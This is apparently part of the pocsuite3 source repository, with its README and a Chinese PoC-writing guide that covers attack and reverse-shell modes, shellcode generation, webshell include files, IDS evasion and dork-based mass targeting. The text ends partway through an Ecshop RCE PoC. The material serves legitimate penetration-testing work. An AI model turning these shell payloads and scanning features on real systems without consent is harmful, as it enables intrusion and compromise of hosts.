*\nrecursive-exclude pocsuite3 __pycache__\nrecursive-exclude pocsuite3 *.py[co]" }, { "path": "README.md", "content": "# pocsuite3\n\n[![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/knownsec/pocsuite3/master/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@seebug-blue.svg)](https://twitter.com/seebug_team)\n\n## Legal Disclaimer\nUsage of pocsuite3 for attacking targets without prior mutual consent is illegal.\npocsuite3 is for security testing purposes only\n\n## 法律免责声明\n未经事先双方同意,使用 pocsuite3 攻击目标是非法的。\npocsuite3 仅用于安全测试目的\n\n## Overview\n\npocsuite3 is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the [**Knownsec 404 Team**](http://www.knownsec.com/). \nIt comes with a powerful proof-of-concept engine, many nice features for the ultimate penetration testers and security researchers.\n\n## Features\n* PoC scripts can running with `verify`, `attack`, `shell` mode in different way\n* Plugin ecosystem\n* Dynamic loading PoC script from anywhere (local file, redis, database, Seebug ...)\n* Load multi-target from anywhere (CIDR, local file, redis, database, Zoomeye, Shodan ...)\n* Results can be easily exported\n* Dynamic patch and hook requests \n* Both command line tool and python package import to use\n* IPv6 support\n* Global HTTP/HTTPS/SOCKS proxy support\n* Simple spider API for PoC script to use\n* YAML PoC support, compatible with [nuclei](https://github.com/projectdiscovery/nuclei)\n* Integrate with [Seebug](https://www.seebug.org) (for load PoC from Seebug website)\n* Integrate with [ZoomEye](https://www.zoomeye.org), [Shodan](https://www.shodan.io), etc. (for load target use `Dork`)\n* Integrate with [Ceye](http://ceye.io/), [Interactsh](https://github.com/projectdiscovery/interactsh) (for verify blind DNS and HTTP request)\n* Friendly debug PoC scripts with IDEs\n* More ...\n\n## Screenshots\n\n### pocsuite3 console mode\n[![asciicast](https://asciinema.org/a/219356.png)](https://asciinema.org/a/219356)\n\n### pocsuite3 shell mode\n[![asciicast](https://asciinema.org/a/203101.png)](https://asciinema.org/a/203101)\n\n### pocsuite3 load PoC from Seebug \n[![asciicast](https://asciinema.org/a/207350.png)](https://asciinema.org/a/207350)\n\n### pocsuite3 load multi-target from ZoomEye\n[![asciicast](https://asciinema.org/a/133344.png)](https://asciinema.org/a/133344)\n\n### pocsuite3 load multi-target from Shodan\n[![asciicast](https://asciinema.org/a/207349.png)](https://asciinema.org/a/207349)\n\n### pocsuite3 load nuclei template\n![](./asset/img/yaml_poc_showcase.png)\n\n### build a docker vulnerability environment\n**require Docker**\n\nwrite dockerfile in poc\n```python\nclass DemoPOC(POCBase):\n vulID = '' # ssvid\n version = '1.0'\n author = ['']\n vulDate = '2029-5-8'\n createDate = '2019-5-8'\n updateDate = '2019-5-8'\n references = ['']\n name = 'Struts2 045 RCE CVE-2017'\n appPowerLink = ''\n appName = 'struts2'\n appVersion = ''\n vulType = ''\n desc = '''S2-045:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3)'''\n samples = []\n category = POC_CATEGORY.EXPLOITS.WEBAPP\n dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''\n```\n#### only run vulnerable environments\n```python\npocsuite -r pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py --docker-start --docker-port 127.0.0.1:8080:8080 --docker-env A=test --docker-port 8899:7890\n\n,------. ,--. ,--. ,----. {2.0.6-cc19ae5}\n| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |\n| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <\n| | --'' '-' \\ `--.-' `' '' | | | | \\ --/'-' |\n`--' `---' `---`----' `----'`--' `--' `----`----' https://pocsuite.org\n[*] starting at 15:34:12\n\n[15:34:12] [INFO] loading PoC script 'pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py'\n[15:34:12] [INFO] Image struts2_045_rce_cve-2017:pocsuite exists\n[15:34:12] [INFO] Run container fa5b3b7bb2ea successful!\n[15:34:12] [INFO] pocsusite got a total of 0 tasks\n[15:34:12] [INFO] Scan completed,ready to print\n```\n\n#### run vulnerable environments and run poc \n```python\n pocsuite -r pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py -u http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action --docker-start --docker-port 127.0.0.1:8080:8080 \n\n,------. ,--. ,--. ,----. {2.0.6-cc19ae5}\n| .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. |\n| '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' <\n| | --'' '-' \\ `--.-' `' '' | | | | \\ --/'-' |\n`--' `---' `---`----' `----'`--' `--' `----`----' https://pocsuite.org\n[*] starting at 15:38:46\n\n[15:38:46] [INFO] loading PoC script 'pocs/Apache_Struts2/20170129_WEB_Apache_Struts2_045_RCE_CVE-2017-5638.py'\n[15:38:46] [INFO] Image struts2_045_rce_cve-2017:pocsuite exists\n[15:38:47] [INFO] Run container 1a6eae1e8953 successful!\n[15:38:47] [INFO] pocsusite got a total of 1 tasks\n[15:38:47] [INFO] running poc:'Struts2 045 RCE CVE-2017' target 'http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action'\n[15:39:17] [+] URL : http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action\n[15:39:17] [+] Headers : {'Server': 'Apache-Coyote/1.1', 'nyvkx': '788544', 'Set-Cookie': 'JSESSIONID=0A9892431B32A541B51D4721FA0D2728; Path=/S2-032-showcase/; HttpOnly', 'Content-Type': 'text/html;charset=ISO-8859-1', 'Transfer-Encoding': 'chunked', 'Date': 'Mon, 25 Dec 2023 07:39:17 GMT'}\n[15:39:17] [INFO] Scan completed,ready to print\n\n+------------------------------------------------------------------+--------------------------+--------+-----------+---------+---------+\n| target-url | poc-name | poc-id | component | version | status |\n+------------------------------------------------------------------+--------------------------+--------+-----------+---------+---------+\n| http://127.0.0.1:8080/S2-032-showcase/fileupload/doUpload.action | Struts2 045 RCE CVE-2017 | | struts2 | | success |\n+------------------------------------------------------------------+--------------------------+--------+-----------+---------+---------+\nsuccess : 1 / 1\n```\n\n\n#### Introduction to vulnerability environment construction\n```shell\nDocker Environment:\n Docker Environment options\n\n --docker-start Run the docker for PoC\n --docker-port DOCKER_PORT\n Publish a container's port(s) to the host\n --docker-volume DOCKER_VOLUME\n Bind mount a volume\n --docker-env DOCKER_ENV\n Set environment variables\n --docker-only Only run docker environment\n\n```\n - `--docker-start` Start environment parameters. If specified, docker images will be obtained from poc.\n - `--docker-port` publish a container's port(s) to the host, like: `--docker-port [host port]:[container port]`,you can specify multiple\n - `--docker-volume` bind mount a volume,like `--docker-volume /host/path/:/container/path`,you can specify multiple\n - `--docker-env` set environment variables `--docker-env VARIBLES=value`,you can specify multiple\n - `--docker-only` only start the docker environment\n\nThe usage is roughly the same as docker’s command line parameters.\n\n## Requirements\n\n- Python 3.8+\n- Works on Linux, Windows, Mac OSX, BSD, etc.\n\n## Installation\n\nPaste at a terminal prompt:\n\n### Python pip\n\n``` bash\npip3 install pocsuite3\n\n# use other pypi mirror\npip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3\n```\n\n### MacOS\n\n``` bash\nbrew update\nbrew info pocsuite3\nbrew install pocsuite3\n```\n\n### [Debian](https://tracker.debian.org/pkg/pocsuite3), [Ubuntu](https://launchpad.net/ubuntu/+source/pocsuite3), [Kali](http://pkg.kali.org/pkg/pocsuite3)\n\n``` bash\nsudo apt update\nsudo apt install pocsuite3\n```\n\n### Docker\n\n```\ndocker run -it pocsuite3/pocsuite3\n```\n\n### ArchLinux\n\n``` bash\nyay pocsuite3\n```\n\n###\n\nOr click [here](https://github.com/knownsec/pocsuite3/archive/master.zip) to download the latest source zip package and extract\n\n``` bash\nwget https://github.com/knownsec/pocsuite3/archive/master.zip\nunzip master.zip\ncd pocsuite3-master\npip3 install -r requirements.txt\npython3 setup.py install\n```\n\n\nThe latest version of this software is available at: https://pocsuite.org\n\n## Documentation\n\nDocumentation is available at: https://pocsuite.org\n\n## Usage\n\n```\ncli mode\n\n\t# basic usage, use -v to set the log level\n\tpocsuite -u http://example.com -r example.py -v 2\n\n\t# run poc with shell mode\n\tpocsuite -u http://example.com -r example.py -v 2 --shell\n\n\t# search for the target of redis service from ZoomEye and perform batch detection of vulnerabilities. The threads is set to 20\n\tpocsuite -r redis.py --dork service:redis --threads 20\n\n\t# load all poc in the poc directory and save the result as html\n\tpocsuite -u http://example.com --plugins poc_from_pocs,html_report\n\n\t# load the target from the file, and use the poc under the poc directory to scan\n\tpocsuite -f batch.txt --plugins poc_from_pocs,html_report\n\n\t# load CIDR target\n\tpocsuite -u 10.0.0.0/24 -r example.py\n\n\t# the custom parameters `command` is implemented in ecshop poc, which can be set from command line options\n\tpocsuite -u http://example.com -r ecshop_rce.py --attack --command \"whoami\"\n\nconsole mode\n poc-console\n```\n\n## How to Contribute\n\n1. Check for open issues or open a fresh issue to start a discussion around a feature idea or a bug.\n2. Fork [the repository](https://github.com/knownsec/pocsuite3) on GitHub to start making your changes.\n3. Write a test which shows that the bug was fixed or that the feature works as expected.\n4. Send a pull request or bug to the maintainer until it gets merged or fixed. Make sure to add yourself to [Contributors](./CONTRIBUTORS.md).\n\n\n## Links\n\n* [Contributors](./CONTRIBUTORS.md)\n* [ChangeLog](./CHANGELOG.md)\n* [Bug tracking](https://github.com/knownsec/pocsuite3/issues)\n* [Copyright](./COPYING)\n* [Pocsuite](https://pocsuite.org)\n* [Seebug](https://www.seebug.org)\n* [ZoomEye](https://www.zoomeye.org)\n* [Knownsec](https://www.knownsec.com)\n" }, { "path": "docs/CODING.md", "content": "# This document has stopped maintenance, please move to https://pocsuite.org\n\nPocsuite3 开发文档及 PoC 编写规范及要求说明\n---\n* [概述](#overview)\n* [插件编写规范](#write_plugin)\n * [TARGETS 类型插件](#plugin_targets)\n * [POCS 类型插件](#plugin_pocs)\n * [RESULTS 类型插件](#plugin_results)\n* [PoC 编写规范](#write_poc)\n * [PoC python 脚本编写步骤](#pocpy)\n * [可自定义参数的 PoC](#可自定义参数的插件)\n * [PoC 编写注意事项](#attention)\n * [Pocsuite3 远程调用文件列表](#inclue_files)\n * [通用API列表](#common_api)\n * [通用方法](#api_common)\n * [参数调用](#api_params)\n * [PoC 代码示例](#PoCexample)\n * [PoC Python 代码示例](#pyexample)\n* [Pocsuite3 集成调用](#pocsuite_import)\n* [PoC 规范说明](#PoCstandard)\n * [PoC 编号说明](#idstandard)\n * [PoC 命名规范](#namedstandard)\n * [PoC 第三方模块依赖说明](#requires)\n * [PoC 结果返回规范](#resultstandard)\n * [extra 字段说明](#result_extara)\n * [通用字段说明](#result_common)\n * [漏洞类型规范](#vulcategory)\n\n\n### 概述
\n 本文档为 Pocsuite3 插件及 PoC 脚本编写规范及要求说明,包含了插件、PoC 脚本编写的步骤以及相关 API 的一些说明。一个优秀的 PoC 离不开反复的调试、测试,在阅读本文档前,请先阅读 [《Pocsuite3 使用文档》](./USAGE.md)。或参考 https://paper.seebug.org/904/ 查看 Pocsuite3 的一些新特性。\n\n### 插件编写规范
\nPocsuite3 共有三种类型的插件,定义在 `pocsuite3.lib.core.enums.PLUGIN_TYPE` 中。\n\n#### TARGETS 类型插件
\nTARGETS 类型插件用来自定义在系统初始化时候加载检测目标的功能,例如从 redis 或数据库加载 targets\n\n```python\nfrom pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuite3.api import register_plugin\n\nclass TargetPluginDemo(PluginBase):\n category = PLUGIN_TYPE.TARGETS\n \n def init(self):\n targets = ['www.a.com', 'www.b.com'] # load from redis, database ...\n count = 0\n for target in targets:\n if self.add_target(target):\n count += 1\n\n info_msg = \"[PLUGIN] get {0} target(s) from demo\".format(count)\n logger.info(info_msg)\n\n\nregister_plugin(TargetPluginDemo)\n```\n\n#### POCS 类型插件
\nPOCS 类型插件用来自定义在系统初始化时候加载 PoC 脚本的功能,例如从 redis 或数据库加载 PoC 脚本代码\n\n```python\nfrom pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuite3.api import register_plugin\n\nclass TargetPluginDemo(PluginBase):\n category = PLUGIN_TYPE.POCS\n \n def init(self):\n pocs = [POC_CODE_1, POC_CODE_2] # load PoC code from redis, database ...\n count = 0\n for poc in pocs:\n if poc and self.add_poc(poc):\n count += 1\n\n info_msg = \"[PLUGIN] get {0} poc(s) from demo\".format(count)\n logger.info(info_msg)\n\n\nregister_plugin(TargetPluginDemo)\n```\n\n#### RESULTS 类型插件
\nRESULTS 类型插件用来自定义检测结果的导出,例如导出 html 报表等\n\n```python\nfrom pocsuite3.api import PluginBase\nfrom pocsuite3.api import PLUGIN_TYPE\nfrom pocsuite3.api import logger\nfrom pocsuite3.api import get_results\nfrom pocsuite3.api import register_plugin\n\nclass HtmlReport(PluginBase):\n category = PLUGIN_TYPE.RESULTS\n\n def init(self):\n debug_msg = \"[PLUGIN] html_report plugin init...\"\n logger.debug(debug_msg)\n\n def start(self):\n # TODO\n # Generate html report\n\n for result in get_results():\n pass\n\n info_msg = '[PLUGIN] generate html report done.'\n logger.info(info_msg)\n\nregister_plugin(HtmlReport)\n\n```\n\n若需要实时的保存结果,需要申明 `handle` 来处理,可参考 https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/plugins/file_record.py 的写法。\n\n### PoC 编写规范
\n\n#### PoC python 脚本编写步骤
\n\n本小节介绍 PoC python 脚本编写\n\nPocsuite3 仅支持 Python 3.x,如若编写 Python3 格式的 PoC,需要开发者具备一定的 Python3 基础\n\n1. 首先新建一个 `.py` 文件,文件名应当符合 [《PoC 命名规范》](#namedstandard)\n\n\n2. 编写 PoC 实现类 `DemoPOC`,继承自 `PoCBase` 类.\n\n```python\nfrom pocsuite3.api import Output, POCBase, register_poc, requests, logger\nfrom pocsuite3.api import get_listener_ip, get_listener_port\nfrom pocsuite3.api import REVERSE_PAYLOAD\nfrom pocsuite3.lib.utils import random_str\n\nclass DemoPOC(POCBase):\n ...\n```\n\n3. 填写 PoC 信息字段,**请认真填写所有基本信息字段**\n```python\n vulID = '99335' # Seebug 漏洞收录ID,如果没有则为0\n version = '1' # PoC 的版本,默认为1\n author = 'seebug' # PoC 的作者\n vulDate = '2021-8-18' # 漏洞公开日期 (%Y-%m-%d)\n createDate = '2021-8-20' # PoC 编写日期 (%Y-%m-%d)\n updateDate = '2021-8-20' # PoC 更新日期 (%Y-%m-%d)\n references = ['https://www.seebug.org/vuldb/ssvid-99335'] # 漏洞来源地址,0day 不用写\n name = 'Fortinet FortiWeb 授权命令执行 (CVE-2021-22123)' # PoC 名称,建议命令方式:<厂商> <组件> <版本> <漏洞类型> \n appPowerLink = 'https://www.fortinet.com' # 漏洞厂商主页地址\n appName = 'FortiWeb' # 漏洞应用名称\n appVersion = '<=6.4.0' # 漏洞影响版本\n vulType = 'Code Execution' # 漏洞类型,参见漏洞类型规范表\n desc = '/api/v2.0/user/remoteserver.saml接口的name参数存在命令注入' # 漏洞简要描述\n samples = ['http://192.168.1.1'] # 测试样列,就是用 PoC 测试成功的目标\n install_requires = ['BeautifulSoup4:bs4'] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写\n pocDesc = ''' poc的用法描述 '''\n dork = {'zoomeye': 'deviceState.admin.hostname'} # 搜索 dork,如果运行 PoC 时不提供目标且该字段不为空,将会调用插件从搜索引擎获取目标。\n suricata_request = '''http.uri; content: \"/api/v2.0/user/remoteserver.saml\";''' # 请求流量 suricata 规则\n suricata_response = '' # 响应流量 suricata 规则\n```\n\n4. 编写验证模式\n\n```python\n def _verify(self):\n output = Output(self)\n # 验证代码\n if result: # result是返回结果\n output.success(result)\n else:\n output.fail('target is not vulnerable')\n return output\n```\n\n5. 编写攻击模式\n\n攻击模式可以对目标进行 getshell,查询管理员帐号密码等操作,定义它的方法与检测模式类似\n```python\ndef _attack(self):\n output = Output(self)\n result = {}\n # 攻击代码\n```\n\n和验证模式一样,攻击成功后需要把攻击得到结果赋值给 result 变量\n\n**注意:如果该 PoC 没有攻击模式,可以在 \\_attack() 函数下加入一句 return self.\\_verify() 这样你就无需再写 \\_attack 函数了。**\n\n6. 编写shell模式 [**new**]\n\nPocsuite3 在 shell 模式会默认监听 `6666` 端口,编写对应的攻击代码,让目标执行反向连接运行 Pocsuite3 系统 IP 的 `6666` 端口即可得到一个 shell\n```python\ndef _shell(self):\n cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())\n # 攻击代码 execute cmd\n```\n\nshell 模式下,只能运行单个 PoC 脚本,控制台会进入 shell 交互模式执行命令及输出\n\n从 ***1.8.5*** 版本开始,Pocsuite3 支持 bind shell。shell 模式和原来的操作方式一致,也需要指定监听 ip 和端口,监听 ip 可以是本地任意 ip,也可以是远程 vps ip。\n\nbind shell 的实现位于 `./pocsuite3/modules/listener/bind_tcp.py`,原理是实现了一个中间层,一端连接漏洞目标的 bind shell(如 telnet 服务、nc 启动的 shell、php 一句话等),另一端连接用户指定的监听 ip 和端口,如此一来,shell 模式可以不受网络环境限制,支持在内网使用。\n\n目前支持三种 bind shell,使用场景如下:\n\n`bind_shell`:通用方法,在 shell 模式中直接调用 `return bind_shell(self, rce_func)` 即可,非常便捷。针对有回显的漏洞,在 PoC 中实现一个 rce(函数名可自定义)方法,函数参数为命令输入,输出为命令输出。如果漏洞无回显,也可以通过写一句话转为有回显的。值得一提的是,用户也可以在 rce 方法中实现流量的加解密以逃避 IDS 检测。\n\n`bind_tcp_shell`:对 tcp 绑定型 shell 的原生支持,在 shell 模式中 `return bind_tcp_shell(bind_shell_ip, bind_shell_port)`\n\n`bind_telnet_shell`:对 telnet 服务的原生支持,在 shell 模式中 `return bind_telnet_shell(ip, port, username, password)`\n\n从 ***1.8.6*** 版本开始,Pocsuite3 支持加密的 shell。PoC 中使用 openssl 的反弹命令(也可以用代码反弹),并且在运行时指定 `--tls` 选项。\n\n7. 结果返回\n\n不管是验证模式或者攻击模式,返回结果 result 中的 key 值必须按照下面的规范来写,result 各字段意义请参见[《PoC 结果返回规范》](#resultstandard)\n\n```\n'Result':{\n 'DBInfo' : {'Username': 'xxx', 'Password': 'xxx', 'Salt': 'xxx' , 'Uid':'xxx' , 'Groupid':'xxx'},\n 'ShellInfo': {'URL': 'xxx', 'Content': 'xxx' },\n 'FileInfo': {'Filename':'xxx','Content':'xxx'},\n 'XSSInfo': {'URL':'xxx','Payload':'xxx'},\n 'AdminInfo': {'Uid':'xxx' , 'Username':'xxx' , 'Password':'xxx' }\n 'Database': {'Hostname':'xxx', 'Username':'xxx', 'Password':'xxx', 'DBname':'xxx'},\n 'VerifyInfo':{'URL': 'xxx' , 'Postdata':'xxx' , 'Path':'xxx'}\n 'SiteAttr': {'Process':'xxx'}\n 'Stdout': 'result output string'\n}\n```\n\noutput 为 Pocsuite3 标准输出 API,如果要输出调用成功信息则使用 `output.success(result)`,如果要输出调用失败则 `output.fail()`,系统自动捕获异常,不需要 PoC 里处理捕获,如果 PoC 里使用 try...except 来捕获异常,可通过`output.error('Error Message')` 来传递异常内容,建议直接使用模板中的 parse_output 通用结果处理函数对 _verify 和 _attack 结果进行处理。\n```\ndef _verify(self, verify=True):\n result = {}\n ...\n\n return self.parse_output(result)\n\ndef parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail()\n return output\n```\n\n8. 注册 PoC 实现类\n\n在类的外部调用 register_poc() 方法注册 PoC 类\n```\nclass DemoPOC(POCBase):\n # POC内部代码\n\n# 注册 DemoPOC 类\nregister_poc(DemoPOC)\n```\n\n#### 可自定义参数的 PoC
\n如果你需要编写一个可以交互参数的 PoC 文件(例如有的 PoC 脚本需要填写登录信息,或者任意命令执行时执行任意命令),那么可以在 PoC 文件中声明一个 `_options` 方法。一个简单的例子如下:\n\n```python\nfrom collections import OrderedDict\n\nfrom pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE\nfrom pocsuite3.api import OptString\n\n\nclass DemoPOC(POCBase):\n vulID = '0' # ssvid\n version = '1.0'\n author = ['seebug']\n vulDate = '2019-2-26'\n createDate = '2019-2-26'\n updateDate = '2019-2-25'\n references = ['']\n name = '自定义命令参数登录例子'\n appPowerLink = 'http://www.knownsec.com/'\n appName = 'test'\n appVersion = 'test'\n vulType = VUL_TYPE.XSS\n desc = '''这个例子说明了你可以使用console模式设置一些参数或者使用命令中的'--'来设置自定义的参数'''\n samples = []\n category = POC_CATEGORY.EXPLOITS.WEBAPP\n\n def _options(self):\n o = OrderedDict()\n o[\"username\"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=True)\n o[\"password\"] = OptString('', description='这个poc需要用户密码,请输出用户密码', require=False)\n return o\n\n def _verify(self):\n result = {}\n payload = \"username={0}&password={1}\".format(self.get_option(\"username\"), self.get_option(\"password\"))\n r = requests.post(self.url, data=payload)\n if r.status_code == 200:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url\n result['VerifyInfo']['Postdata'] = payload\n\n return self.parse_output(result)\n\n def _attack(self):\n return self._verify()\n\n def parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail('target is not vulnerable')\n return output\n\n\nregister_poc(DemoPOC)\n```\n\n它可以使你在 `console` 或者 `cli` 模式下调用。\n\n- 在 console 模式下,Pocsuite3 模仿了 msf 的操作模式,你只需要使用 `set` 命令来设置相应的参数,然后 `run` 或者 `check` 来执行(`attack` 和 `shell` 命令也可以)。\n- 在 cli 模式下,如上面例子所示,定义了 `username` 和 `password` 两个字段,你可以在参数后面加上 `--username test --password test` 来调用执行,需要注意的是,如果你的参数中包含了空格,用双引号 `\"` 来包裹它。\n\n##### 自定义字段\n\n像其他工具一样,如果你想使用自定义的字段,将它定义到 `_options` 方法中,然后返回一个数组。如果在 PoC 文件中想调用自定义字段,需要提前引入:\n\n```python\nfrom pocsuite3.api import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItems\n```\n\n| 字段类型 | 字段描述 | 参数解释 | 相关例子 |\n| ---------- | ------------------------------------------------------------ | ------------------------------------------------------------ | -------- |\n| OptString | 接收字符串类型参数 | default: 传入一个默认值
descript: 字段描述,默认为空
require: 是否必须,默认False | |\n| OptDict | 接收一个字典类型参数,在选择上如果选择key,调用时会调用对应的value | default: 传入一个默认值
descript: 字段描述,默认为空
require: 是否必须,默认False | |\n| OptIP | 接收IP类型的字符串 | default: 传入一个默认值
descript: 字段描述,默认为空
require: 是否必须,默认False | |\n| OptPort | 接收端口类型参数 | default: 传入一个默认值
descript: 字段描述,默认为空
require: 是否必须,默认False | |\n| OptBool | 接收布尔类型参数 | default: 传入一个默认值
descript: 字段描述,默认为空
require: 是否必须,默认False | |\n| OptInteger | 接收整数类型参数 | default: 传入一个默认值
descript: 字段描述,默认为空
require: 是否必须,默认False | |\n| OptFloat | 接收浮点数类型参数 | default: 传入一个默认值
descript: 字段描述,默认为空
require: 是否必须,默认False | |\n| OptItems | 接收list类型参数 | default: 传入一个默认值
selectd: 默认选择
descript: 字段描述,默认为空
require: 是否必须,默认False | |\n\n需要注意的是,`console` 模式支持所有的参数类型,`cli` 模式除了`OptDict`、`OptBool`、`OptItems` 类型外都支持。\n\n#### PoC 编写注意事项
\n1. 要求在编写 PoC 的时候,尽量的不要使用第三方模块,如果在无法避免的情况下,请认真填写 install_requires 字段,填写格式参考《PoC 第三方模块依赖说明》。\n2. 要求编写 PoC 的时候,尽量的使用 Pocsuite3 已经封装的 API 提供的方法,避免自己重复造轮子,对于一些通用方法可以加入到 API,具体参考《通用 API 列表》。\n3. 如果 PoC 需要包含远程文件等,统一使用 Pocsuite3 远程调用文件,具体可以参考[《Pocsuite3 远程调用文件列表》](#inclue_files),不要引入第三方文件,如果缺少对应文件,联系管理员添加。\n4. 要求每个 PoC 在编写的时候,尽可能的不要要求输入参数,这样定制化过高,不利于 PoC 的批量化调度执行,尽可能的 PoC 内部实现参数的构造,至少应该设置默认值,如某个 PoC 需要指定用户id,那么应该允许使用 extar_param 传入 id,也应该没有传入该参数的时候自动设置默认值,不应该影响 PoC 的正常运行与验证。\n5. 要求每个 PoC 在输出结果的时候,尽可能的在不破坏的同时输出取证信息,如输出进程列表,具体参考[《PoC 结果返回规范》](#resultstandard)。\n6. 要求认真填写 PoC 信息字段,其中 vulID 请填写 Seebug 上的漏洞 ID(不包含 SSV-)。\n7. 为了防止误报产生以及避免被关键词被 WAF 等作为检测特征,要求验证结果判断的时候输出随机的字符串(可以调用 API 中的`random_str`方法),而不用采用固定字符串。\n比如: \n\n```\n检测 SQL 注入时:\n token = random_str()\n payload = 'select md5(%s)' % token\n ...\n\n if hashlib.new('md5', token).hexdigest() in content:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url\n\n检测 XSS 漏洞时:\n # 可参考 https://paper.seebug.org/1119/\n\n token = random_str()\n payload = 'alert(\"%s\")' % token\n ...\n\n if payload in content:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url\n\n检测 PHP 文件上传是否成功:\n\n token = random_str()\n payload = '' % token\n ...\n\n if hashlib.new('md5', token).hexdigest() in content:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url\n```\n\n8. 任意文件如果需要知道网站路径才能读取文件的话,可以读取系统文件进行验证,要写 Windows 版和 Linux 版两个版本。\n9. 检测模式下,上传的文件一定要删掉。\n10. 程序可以通过某些方法获取表前缀,just do it;若不行,保持默认表前缀。\n11. PoC 编写好后,务必进行测试,测试规则为:5 个不受漏洞影响的网站,确保 PoC 攻击不成功;5 个受漏洞影响的网站,确保 PoC 攻击成功\n\n#### Pocsuite3 远程调用文件列表
\n部分 PoC 需要采用包含远程文件的形式,要求基于 Pocsuite3 的 PoC 统一调用统一文件(如需引用未在以下文件列表内文件,请联系 404-team@knownsec.com 或者直接提交 issue)。\n统一 URL 调用路径:`https://pocsuite.org/include_files/`,如 `https://pocsuite.org/include_files/xxe_verify.xml`\n\n**文件列表**\n\n|文件名|说明|\n|-----|---|\n|a.jsp|一个通用简单的 JSP 一句话 Shell,攻击模式|\n|b.jsp|一个通用简单的 JSP 一句话 Shell,验证模式|\n|php_attack.txt|PHP 一句话|\n|php_verify.txt|PHP 打印 md5 值|\n|xxe_verify.xml|XXE 验证文件|\n\n\n#### 通用 API 列表
\n在编写 PoC 的时候,相关方法请尽量调用通用的已封装的 API\n\n**通用方法**
\n\n|方法|说明|\n|---|----|\n|from pocsuite3.api import logger|日志记录,比如logger.log(info)|\n|from pocsuite3.api import requests|请求类,用法同 requests|\n|from pocsuite3.api import Seebug|Seebug api 调用|\n|from pocsuite3.api import ZoomEye|ZoomEye api 调用|\n|from pocsuite3.api import CEye|Ceye api 调用|\n|from pocsuite3.api import crawl|简单爬虫功能|\n|from pocsuite3.api import PHTTPServer|Http服务功能|\n|from pocsuite3.api import REVERSE_PAYLOAD|反向连接shell payload|\n|from pocsuite3.api import get_results|获取结果|\n\n**参数调用**
\n\n* self.headers 用来获取 http 请求头, 可以通过 --cookie, --referer,--user-agent,--headers 来修改和增加需要的部分\n* self.params 用来获取 --extra-params 赋值的变量,Pocsuite3 会自动转化成字典格式,未赋值时为空字典\n* self.url 用来获取 -u / --url 赋值的 URL,如果之前赋值是 baidu.com 这样没有协议的格式时, Pocsuite3 会自动转换成 http://baidu.com\n\n##### ShellCode 生成支持\n\n在一些特殊的 Linux 和 Windows 环境下,想得到反弹 shell 条件比较困难。为此我们制作了用于在 Windows/Linux x86 x64 环境下的用于反弹的 shellcode,并制作了接口支持,你在只需要拥有命令执行权限下便可以自动将 shellcode 写入到目标机器以及执行反弹 shell 命令。Demo Poc:https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/thinkphp_rce2.py\n\n```python\nfrom pocsuite3.api import generate_shellcode_list\n_list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(), os_target=OS.LINUX, os_target_arch=OS_ARCH.X86)\n```\n\n将生成一长串执行指令,执行这些指令便可以反弹出一个 shell。\n\n##### HTTP 服务内置\n\n对于一些需要第三方 HTTP 服务才能验证的漏洞,Pocsuite3 也提供对应的API,支持在本地开启一个 HTTP 服务方便进行验证。\n\n可查看测试用例:https://github.com/knownsec/pocsuite3/blob/master/tests/test_httpserver.py\n\n#### PoC 代码示例
\n\n##### PoC Python 代码示例
\n\n[Ecshop 2.x/3.x Remote Code Execution](http://www.seebug.org/vuldb/ssvid-97343) PoC:\n\n```\nimport base64\nfrom urllib.parse import urljoin\n\nfrom pocsuite3.api import Output, POCBase, register_poc, requests, logger\nfrom pocsuite3.api import get_listener_ip, get_listener_port\nfrom pocsuite3.api import REVERSE_PAYLOAD\nfrom pocsuite3.lib.utils import random_str\nfrom requests.exceptions import ReadTimeout\n\n\nclass DemoPOC(POCBase):\n vulID = '97343' # ssvid\n version = '3.0'\n author = ['seebug']\n vulDate = '2018-06-14'\n createDate = '2018-06-14'\n updateDate = '2018-06-14'\n references = ['https://www.seebug.org/vuldb/ssvid-97343']\n name = 'Ecshop 2.x/3.x Remote Code Execution'\n appPowerLink = ''\n appName = 'ECSHOP'\n appVersion = '2.x,3.x'\n vulType = 'Romote Code Execution'\n desc = '''\n '''\n samples = []\n install_requires = ['']\n\n def _verify(self):\n result = {}\n path = \"user.php?act=login\"\n url = urljoin(self.url, path)\n echashs = [\n '554fcae493e564ee0dc75bdf2ebf94ca', # ECShop 2.x hash\n 